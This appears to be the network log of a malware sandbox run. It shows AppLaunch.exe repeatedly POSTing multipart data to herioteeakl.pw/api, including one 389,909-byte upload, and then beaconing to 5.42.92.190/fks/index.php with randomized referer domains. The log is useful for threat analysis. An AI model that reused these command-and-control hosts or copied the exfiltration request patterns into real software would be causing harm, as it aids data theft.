HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=dme672kgi0iv8o28bfp28mm9hq; expires=Fri, 08 Mar 2024 18:18:07 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:28 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Qg2V4GlxoLnXirnw112TboINvT28u25ln8Zo1CmP%2BvitkppomejEdH5Ge0Rw0xmuUhEyQkMAJB3rpKoZItGagYGXhbaXlaYpl2huBC3LCbfMQrNpjSrWsdcG%2BwZxUmonsA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26db3f3f66a3-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=hdcva4p2fmmmr23anlmm8tirmp; expires=Fri, 08 Mar 2024 18:18:07 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:28 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ECUMvfxusoRlOF9cdNUScOxCkXeUvW9ygjBJAbWOdWTmaGYWav3yyeBejtiVCzaV8uZybDT5bNJmXIMwlhj7OlKyGU70LLFLQPUlQvCuxk9kxzmEtNHhUhS%2Bxn7kEVIn2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26dc3d3d0b04-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=suv7206tnt0bjmve990fdlifet; expires=Fri, 08 Mar 2024 18:18:07 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:28 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3iod0Gl1VgoBfsHbEJLs77BjSd%2FwKlazS8Y6iEKaAW9oWzLjXzZqkowh2afSajs6PZe910zOelW34R4gPURZ0Nr0YNsjvMad5PHdcfLZlH1zwVvysspiH16WZ6jkYFS2RQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26dd4f45b992-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 17813
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=0t3h34t0frabghoq48qv8lklbj; expires=Fri, 08 Mar 2024 18:18:08 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:29 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fbw9eP5qwg6OD9KdylZphGOdb70%2FpYlNmlweE%2B9S7bgVMBmfviDELLKieX7ipsYEt38SAi3BopRVEyscr5kfLiUxKTRbzPossZAbUWV7%2FEGWlcR45r6fF892h4GOpoa1dw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26dfafab1caa-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=1il9b9eu1j4p9pka41uk142uh0; expires=Fri, 08 Mar 2024 18:18:10 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:31 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qGalUlX0EKycBTXb7gUPTFqiprDFtY0WYOpAYsDeBdlZf4HqooO%2FVLLTtVf6%2BUOxKjmCibVsBHCxVZyxCQoSiIsvHdGCvt2pIPGapTq5ZLIh8j%2BE57kgT6ae85BMuuDY1w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26eec9b4b950-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=nnebuqol28t89ornms78em2af7; expires=Fri, 08 Mar 2024 18:18:10 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:31 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jv3EpluZdtsSL3GuIW3jMLzrnek3TzyG3sO4LDV33nb5GE2NZxLWa7XL3xlRGV%2BNbrAW%2FoeP550blXiWZLZOd5tOMJGYKpX8yEIKYDK6sAXA%2FFIWqVBdnAxqsABJQOJa7g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26f00f31b987-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=k5htiq5fuq06l8vhj2b7sfah55; expires=Fri, 08 Mar 2024 18:18:11 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:32 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Oa%2BsRxcPlsc9dWo2icdTrBAKLRX64rkncaSDyOK5GNPu3gogywUcHCJkwNuWGjlc8C6Kpsm4tnv9tjKam2AaASS6FJGyxKHp0i7QUc09W104nPJZ2HTl4q102MGaQrFiag%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26f18f7c65f1-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=a4nshmvd9armgv3aumji1mbhlk; expires=Fri, 08 Mar 2024 18:18:11 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:32 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1lsD8pR2PMWVOwjecT4JNnANwtZyN4zhY0l7S5qedcs6FhGJmIVdWa7Vf2vcKxykkXniR%2BMb0%2F8YSz%2FBBnJxTeohrS6IO3RwOEm4jeUd3tm0d11k9NkRTSn4zEXSNxZ0Rg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26f2bff4669c-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=ke5j77g7utc1lfkmf0s1arc42m; expires=Fri, 08 Mar 2024 18:18:11 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:32 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EjoHzxTbv5ZS302l6TMpQRTHdCQ%2FNNYrMsERewLJooghFlLgnK6wZGxwfpb%2B%2BQJPf8W%2FfvdYjX56n1aUij7hHgyy6Xxa1s6oUf%2F7h44%2BMp3r1qkqzNT9sSXyKIG%2FzDlRiA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26f3bff7664c-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=4cvq50ucf0l55fhpnafjffuaij; expires=Fri, 08 Mar 2024 18:18:11 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:32 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W4VM%2BhuPTQH4p427461U%2BIoTTLeRuwi2gCLWIul6L9t1jvkgZS3QYASvhVN3g%2B7MiuoahDfdeKFwTSSD6Z8iP1ai%2B9Kqt4k2nEgLt8eIzq59jyGw2AUwgPfT5C20gsMJjg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26f4e8d566e8-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=8vc3irahtpcq53qi8tkc5ahpj3; expires=Fri, 08 Mar 2024 18:18:11 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:32 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j05iD%2FVuz1GFr95tWISIKh1F6opmJ1mTKNSAaoGdobITrgNOeSiZI29%2FJ%2FU6MicxvVZeSJp55N2bkFjlaq5RYbmmz7jXUGEQ3NAMeQXMj3aUT4B%2BiAGROW2QrejsRhwBfw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26f5fa31b7fb-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=sk0ig9sga80719737dtgjujsop; expires=Fri, 08 Mar 2024 18:18:12 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:33 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GlJkl5zI6fHJTJ2by987z3B%2B9XZWF2hjC6cGnM%2BJM%2BUtHOOWoB5ai46bEs0TO%2FTclBcb94TDe4VPyi3fJSliCxyyPQu9KvMwC5O95tJb5332TQwMAYJFYtPPU1y8xDk2vQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26f72cbe0e18-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 1004
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=o5uol8dlhtmmr90eg18nh88jje; expires=Fri, 08 Mar 2024 18:18:12 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:33 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=80U8kefIEtR%2FYQAZQA5Ml5MF28Cw8vA%2FRrz%2BMEIDzdsEea16nGxzbvj7I%2FY0aLjwkGiYlf564ti3zqMVmihBrcu%2BFfQAcasn6gphnQqKEaMjk1lg6QcgqAfurJ%2BobOxR8A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26f85c3b0e94-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 1511
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=seebl84ob6248csblg54cgrihj; expires=Fri, 08 Mar 2024 18:18:12 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:33 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FJMHc%2BInM156f9GoTehW0yrOoR3fyYzIyJvNYoeB16ZKHmEeauJQS6EgVB5SN10cZDpgojYeDiSMSh4ahgERtLCxco54fFfyxFiMUKTAwVQ%2B%2Bx7iPGqotybMHM0vzAhPaw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26f9be2566b7-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 389909
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=c95hh32q3a7cutjsvunqlt3eog; expires=Fri, 08 Mar 2024 18:18:13 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:34 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2EuXOv1cw78VT32dYAecNosfCjYYlj1rRRktxQSwmHuVFx64%2B5wA0ZEEHH%2B9VjJFcExO73dKx80YUs0eWSI6r8Vhp2ugH%2FPbgQcWEiZmiIH0H%2FhKXq5momI5qNGb5fjkrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26fc4c24655b-AMS
DNS

254.210.247.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

254.210.247.8.in-addr.arpa

IN PTR

Response
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dgbgwfkkywmojg.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 223
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:31:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cdrtxnhwfvdhmt.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 259
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:31:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 41
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nvtrytacvkepf.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 309
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:31:45 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hjpbqdqmvip.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 121
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:31:45 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

